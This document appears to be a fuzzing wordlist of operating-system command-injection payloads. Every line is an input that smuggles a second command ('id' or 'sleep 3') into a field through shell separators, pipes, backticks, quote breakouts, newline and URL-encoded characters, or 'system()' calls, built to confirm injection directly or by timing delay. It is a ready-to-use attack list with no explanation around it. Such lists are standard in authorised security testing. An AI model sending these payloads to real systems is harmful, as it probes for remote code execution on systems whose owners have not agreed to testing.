id
/index.html|id|
&& id
|| id
& id
| id
 && id
 || id
 & id
 | id
" && id
" || id
" & id
" | id
" ;id;
" ;id
' && id
' || id
' & id
' | id
' ;id;
' ;id
;id;
|id
|/usr/bin/id
|id|
|/usr/bin/id|
||/usr/bin/id|
|id;
||/usr/bin/id;
;id|
;|/usr/bin/id|
\n/usr/bin/id\n
\nid\n
\n/usr/bin/id;
\nid;
\n/usr/bin/id|
\nid|
;/usr/bin/id\n
;id\n
|usr/bin/id\n
|nid\n
`id`
`/usr/bin/id`
;system('id')
;system('/usr/bin/id')
%0A/usr/bin/id
%0Aid
%0A/usr/bin/id%0A
%0Aid%0A
| id
& id
; id
%0a id %0a
`id`
sleep 3
/index.html|sleep 3|
&& sleep 3
|| sleep 3
& sleep 3
| sleep 3
 && sleep 3
 || sleep 3
 & sleep 3
 | sleep 3
" && sleep 3
" || sleep 3
" & sleep 3
" | sleep 3
" ;sleep 3;
" ;sleep 3
' && sleep 3
' || sleep 3
' & sleep 3
' | sleep 3
' ;sleep 3;
' ;sleep 3
;sleep 3;
|sleep 3
|sleep 3|
;sleep 3\n
`sleep 3`
;system('sleep 3')
%0Asleep%0A3
| sleep 3
& sleep 3
; sleep 3